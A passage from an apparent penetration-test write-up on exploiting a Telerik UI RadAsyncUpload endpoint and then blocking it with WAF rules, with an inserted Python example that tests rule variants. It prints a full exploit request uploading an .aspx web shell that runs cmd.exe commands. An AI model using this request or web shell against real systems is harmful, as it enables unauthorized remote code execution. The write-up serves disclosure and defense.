the following information:</span></p><ol cid="n27" class="ol-list" mdtype="list" start="" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; margin: 0.8em 0px; padding-left: 30px; position: relative;"><li cid="n28" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n29" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The -P parameter contains the path of the destination folder where the file needs to be uploaded. In our case, it contained the path of the web root discovered at an earlier stage.</span></p></li><li cid="n30" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n31" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The version of Telerik UI, so that the tool can use the correct key to encrypt the </span><span class="md-pair-s" md-inline="em" style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">rauPostData</span></em></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">.</span></p></li><li cid="n32" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n33" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The file to upload. 
In our case, the malicious .aspx file shown above.</span></p></li><li cid="n34" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n35" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The target URL of the Telerik RadAsyncUpload endpoint.</span></p></li><li cid="n36" class="md-list-item" mdtype="list_item" style="box-sizing: border-box; margin: 0px; position: relative;"><p cid="n37" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; line-height: inherit; margin: 0px 0px 0.5rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The address of a proxy through which the requests performed by the tool can be inspected.</span></p></li></ol><p cid="n38" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Launching the tool produced the following request:</span></p><pre cid="n40" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; 
overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">POST</span> <span class="cm-string-2" style="box-sizing: border-box; color: #ff5500;">/ApplicationPath/Telerik.Web.UI.WebResource.axd?type=rau</span> <span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Host:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> victim.com</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Encoding:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> gzip, deflate</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 3221</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> multipart/form-data; boundary=---------------------------62616f37756f2f</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 
0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="rauPostData"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">ATTu5i4R+V[Encrypted rauPostData Payload in base64]FAlzLUg==</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="file"; filename="blob"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Type: application/octet-stream</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><%@ Page Language="VB" Debug="true" %></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><%@ import Namespace="system.IO" %></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><%@ import Namespace="System.Diagnostics" %></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><html xmlns="www.w3.org/1999/xhtml"></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><head 
runat="server"></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><title>Test</title></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"></head></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><body></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><form id="form1" runat="server"></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><div></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span><% </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>Dim myProcess As New Process() </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>Dim myProcessStartInfo As New ProcessStartInfo("c:\windows\system32\cmd.exe")</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span 
class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>myProcessStartInfo.UseShellExecute = false</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>myProcessStartInfo.RedirectStandardOutput = true</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>myProcess.StartInfo = myProcessStartInfo</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>myProcessStartInfo.Arguments="/c dir"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>myProcess.Start()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>Dim myStreamReader As StreamReader = myProcess.StandardOutput</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>Dim myString As String = myStreamReader.Readtoend()</span><br /><span 
role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>myProcess.Close()</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>mystring=replace(mystring,"<","&lt;")</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>mystring=replace(mystring,">","&gt;")</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>Response.Write(vbcrlf & "<pre>" & mystring & "</pre>")</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span>%></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span></div></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " face="var(--monospace)" role="presentation" style="box-sizing: border-box; display: inline-block; position: relative;"> </span></form></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 
0.1px;"></body></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"></html></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="fileName"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">RAU_crypto.bypass</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="contentType"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">text/html</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="lastModifiedDate"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">2019-01-02T03:04:05.067Z</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; 
name="metadata"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"test_109742195623.aspx"}</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f--</span></pre><p cid="n41" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n42" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Note that the application sends a request to the <i>"/Telerik.Web.UI.WebResource.axd?type=rau"</i> endpoint, attaching the malicious file and the </span><span class="md-pair-s" md-inline="em" style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">rauPostData</span></em></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> parameter, which contains all the encrypted metadata required by Telerik to handle the uploaded file.</span></p><p cid="n43" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 
0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Since the </span><span class="md-pair-s" md-inline="em" style="box-sizing: border-box;"><em style="box-sizing: border-box;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">rauPostData</span></em></span><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"> parameter was encrypted with the hardcoded key of Telerik version 2014.2.724, the application accepts the unauthenticated upload, as shown in the response to the previous request.</span></p><p cid="n44" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Response:</span></p><pre cid="n45" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #229922;">200</span> OK</span><br /><span role="presentation" style="box-sizing: 
border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Cache-Control:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> private</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> text/html; charset=utf-8</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Date:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Wed, 01 Apr 2020 10:48:50 GMT</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 667</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":884,"DateJson":"2019-01-02T03:04:05.067Z","Index":0}, "metaData":"[Base64 Metadata]" }</span></pre><p cid="n46" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; 
orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n20" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"></span></p><p cid="n47" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Since the malicious ".aspx" was uploaded to a known folder in the web root of the application, it was then sufficient to request the file through the application's URL to execute the code. 
The following screenshot shows the code listing the contents of the "<i>C:\Windows\SysWOW64\inetsrv</i>" directory of the IIS web server hosting the vulnerable application.</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-8Q9p92TETp4/X6b3p76xc5I/AAAAAAAAAAU/FpIAUo_wJsQJ97r5RoAmKn7EH3a3PXiWQCLcBGAsYHQ/s678/better.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="371" data-original-width="678" height="270" src="https://1.bp.blogspot.com/-8Q9p92TETp4/X6b3p76xc5I/AAAAAAAAAAU/FpIAUo_wJsQJ97r5RoAmKn7EH3a3PXiWQCLcBGAsYHQ/w493-h270/better.png" width="493" /></a></div><div><h4 cid="n51" class="md-end-block md-heading" mdtype="heading" style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Fixing the Issue at WAF level</span></h4><p cid="n52" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Once the criticality of the vulnerability was confirmed, the client was immediately contacted to expedite the fix of the vulnerable file upload.</span></p><p cid="n53" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: 
inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The <b>ideal fix</b> for the vulnerability would be <b>updating the version</b> of <i>Telerik UI</i> used by the application to the latest release, which is no longer vulnerable. </span></p><p cid="n53" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">However, <b>the client informed us</b>, shortly after the disclosure, that it had <b>no immediate control over the vulnerable asset since it was a third-party product that could not be updated right away.</b></span></p><p cid="n54" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The application could not <i>simply be decommissioned</i> because it was still <u>actively</u> used within the organization. 
</span></p><p cid="n54" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><i>"So, what now?"</i></span></p><p cid="n54" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;">The only viable option for the client was to <b>create a WAF rule</b> that would block any request exploiting the vulnerable file upload functionality offered by Telerik.</p><p cid="n54" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><br /></span></p><p cid="n55" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The following paragraphs recap the various attempts that were made </span>to address the vulnerability, in collaboration with the client's WAF engineers, without impacting the usability of the asset.</p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: 
#333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><b>- <u>1st WAF Rule - Overkill</u></b></span></p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span style="font-size: 16px;">The first rule attempt consisted of <i>blocking all incoming requests</i> towards the "<i>/Telerik.Web.UI.WebResource.axd</i>" endpoint of Telerik UI. </span></p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span style="font-size: 16px;">Unfortunately, the rule was <b>too strict.</b> It blocked not only every malicious call, but also any interaction of the application with Telerik UI, making the user interface <i>unusable</i>.</span><span style="font-size: 16px;">
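Blocking by path alone is too coarse, and the rules this post moves to next key on the "type=rau" parameter instead; those only hold if the WAF normalizes the value (percent-decoding and case-folding) before comparing it. The following Python block is an added example, not code from the original post, from Telerik or from the client's WAF: it models the three rule strategies the post walks through and evaluates them against constructed request targets. The handler path and the "type=rau" value come from the post; the "type=other" and "/Default.aspx" targets are constructed stand-ins for legitimate traffic.

```python
"""Added example (not from the original post): three WAF-rule strategies for
the Telerik RadAsyncUpload handler, evaluated against constructed targets."""
from urllib.parse import unquote, urlsplit

# Compared case-insensitively, since IIS treats request paths as case-insensitive.
TELERIK_HANDLER = "/telerik.web.ui.webresource.axd"
# Value of the "type" query parameter that selects the RadAsyncUpload handler.
UPLOAD_TYPE = "rau"


def _normalize(component: str) -> str:
    """Percent-decode once and case-fold, so 'ra%75', 'raU' and 'rau' agree."""
    return unquote(component).lower()


def _is_telerik_handler(raw_path: str) -> bool:
    return _normalize(raw_path) == TELERIK_HANDLER


def rule1_block_handler(request_target: str) -> bool:
    """1st rule (overkill): block every request to the Telerik handler,
    regardless of which resource type it asks for."""
    return _is_telerik_handler(urlsplit(request_target).path)


def rule2_raw_substring(request_target: str) -> bool:
    """2nd rule as first deployed: literal 'type=rau' substring match on the
    raw query string, with no decoding and no case folding."""
    parts = urlsplit(request_target)
    return _is_telerik_handler(parts.path) and "type=rau" in parts.query


def rule3_normalized(request_target: str) -> bool:
    """Hardened rule: split the query string into name/value pairs, then
    decode and case-fold each side before comparing."""
    parts = urlsplit(request_target)
    if not _is_telerik_handler(parts.path):
        return False
    for pair in parts.query.split("&"):
        name, _, value = pair.partition("=")
        if _normalize(name) == "type" and _normalize(value) == UPLOAD_TYPE:
            return True
    return False


def evaluate(request_target: str) -> dict:
    """Verdict of each rule for one request target (True means blocked)."""
    return {
        "rule1": rule1_block_handler(request_target),
        "rule2": rule2_raw_substring(request_target),
        "rule3": rule3_normalized(request_target),
    }


# Constructed request targets: the first three mirror the variants shown in
# the post, the last two stand in for legitimate traffic.
SAMPLES = [
    "/Telerik.Web.UI.WebResource.axd?type=rau",    # plain upload request
    "/Telerik.Web.UI.WebResource.axd?type=ra%75",  # URL-encoded 'u'
    "/Telerik.Web.UI.WebResource.axd?type=raU",    # mixed case
    "/Telerik.Web.UI.WebResource.axd?type=other",  # constructed benign use of the handler
    "/Default.aspx?type=rau",                      # constructed, not the handler
]

if __name__ == "__main__":
    print(f"{'request target':48} rule1  rule2  rule3")
    for target in SAMPLES:
        v = evaluate(target)
        print(f"{target:48} {v['rule1']!s:6} {v['rule2']!s:6} {v['rule3']!s}")
```

Running the block prints one row per target: rule 1 blocks the benign "type=other" request along with the rest (the false positive that made the UI unusable), rule 2 lets the encoded and mixed-case variants through, and rule 3 blocks exactly the three upload variants. The single decode in `_normalize` matches what the post describes; a WAF that decodes more than once should bound the number of passes.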
</span></p><p cid="n60" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><b>- </b><b><u>2nd WAF Rule: Hunting for "<i>rau</i>"</u></b></span></p><p cid="n62" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Goal: block all requests to Telerik UI that use the <i>RadAsyncUpload</i> functionality.</span></p><p cid="n62" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The rule was relaxed by adding a condition. 
